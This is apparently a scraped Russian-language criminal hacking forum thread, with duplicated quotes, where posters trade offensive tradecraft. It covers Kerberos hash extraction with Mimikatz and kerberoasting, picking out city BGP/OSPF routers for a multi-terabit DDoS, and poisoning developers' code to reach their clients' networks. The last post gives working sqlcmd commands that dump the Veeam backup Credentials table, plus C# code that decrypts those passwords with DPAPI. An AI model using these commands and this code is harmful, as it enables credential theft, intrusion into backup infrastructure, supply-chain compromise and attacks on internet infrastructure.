Имеешь в этом опыт ?бери в руки керберос, снимай с него хеш
(гугли kerberoasting, asreproasting еще недавно появился timeroasting но он актуален только в больших сетях)
Имеешь в этом опыт ?бери в руки керберос, снимай с него хеш
(гугли kerberoasting, asreproasting еще недавно появился timeroasting но он актуален только в больших сетях)
Друзья всем привет!
Кто может подсказать как снять kerberos hash
MimikatzДрузья всем привет!
Кто может подсказать как снять kerberos hash
Маршрутизируемые сети и автономные зоны погут не совпадать с административными территориями. Тут могут оказаться важнее точки обмена трафиком.как можно отследить критически важные сетевые ноды городского интернета (BGP, OSPF) для точечной атаки по L3 только через mtr, tcptraceroute? И хватит ли нагрузки в 5tbps+ что бы задушить несколько таких?
BGP это 179/TCP порт, одна AS'ка другой AS'ке аннонсит туда. ну и собсно 179/TCP смотришь где и туда лупишь!... не? ;-)как можно отследить критически важные сетевые ноды городского интернета (BGP, OSPF) для точечной атаки по L3 только через mtr, tcptraceroute? И хватит ли нагрузки в 5tbps+ что бы задушить несколько таких?
Дык поздравы! Этож 3-е место в OWASP TOP 10 2025. Отравляете код (вот тут главное не спалиться) и внедряетесь везде куда разрабы это дело раскатывают. Или я чего-то не понял?ССШ ключи хоть куда то и ведут, но по сути ведут к сайту (рутовые) самих разрабов.
Судя по всему, мы уже в эндпоинтах раскатанных. Не, раскатать страшилки по всему что развернуто можно, для клиентсайда, но хочется в сетки самих клиентов вебмастерской.Дык поздравы! Этож 3-е место в OWASP TOP 10 2025. Отравляете код (вот тут главное не спалиться) и внедряетесь везде куда разрабы это дело раскатывают. Или я чего-то не понял?
Здраствуйте. Что то в новых вимах нету sqlservr.exe всё на постгресе завязанно. SQLshell не конектит в базе с ошибкой вылетает. Есть новое решение у кого нибудь? В пМ можно, дабы тему не убить )))берешь серв где у тебя виам. снимаешь такслист
Код:tasklist /v
ищешь PID от sqlservr.exe
Код:netstat -ano
потом с этого же серва снимаешь netstat -ano и ишешь порт по пиду sqlservr.ехе
Пример вывода
Код:sqlservr.exe 1328 Services 0 1,016,020 K 1328 -- вбивиаем в нетсате -ано TCP 0.0.0.0:49679 0.0.0.0:0 LISTENING 1328
пид 1328
порт 49679
Ищешь порт MsSQL по PID в 2-х выводах
ищешь где лежит sqlcmd.exe
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
или
-Код:sqlcmd -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
опция -y0 обязательно иначе sqlcmd режет вывод
+++
=====
дальше берёшь вот такой код и создаешь файл veeam.cs
C#:using System; using System.Collections.Generic; using System.Security.Cryptography; using System.Text; namespace Main { internal static class Program { private static void Decrypt(string b,string a){ if (string.IsNullOrEmpty(a)) { return; } byte[] encryptedData = Convert.FromBase64String(a); Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine))); return; } private static void Main(string[] args) { Decrypt("необязательный юзернейм","тут хэш из вывода sqlcmd"); } } }
на каждый хэш отдельный вызов функции Decrypt
файл что создали с кодом выше, кладем в папку, и вызываем:
сообираешь c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs
полученный exe закидываешь на сервер с veeam и запускаешь
@Dropbear